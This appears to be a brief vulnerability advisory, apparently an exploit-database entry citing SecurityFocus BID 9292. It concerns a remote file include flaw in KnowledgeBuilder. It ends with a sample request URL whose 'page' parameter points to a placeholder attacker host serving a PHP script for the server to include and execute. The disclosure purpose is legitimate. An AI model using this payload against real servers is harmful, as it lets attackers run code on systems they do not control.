5 lines
No EOL
400 B
Text
5 lines
No EOL
400 B
Text
source: http://www.securityfocus.com/bid/9292/info
|
|
|
|
KnowledgeBuilder is prone to a remote file include vulnerability. An attacker could exploit this to cause hostile PHP scripts to be included and executed from a remote server. This would occur in the security context of the web server hosting the software.
|
|
|
|
http://www.example.com/kb/index.php?page=http://[attacker's_host]/[attacker's_script] |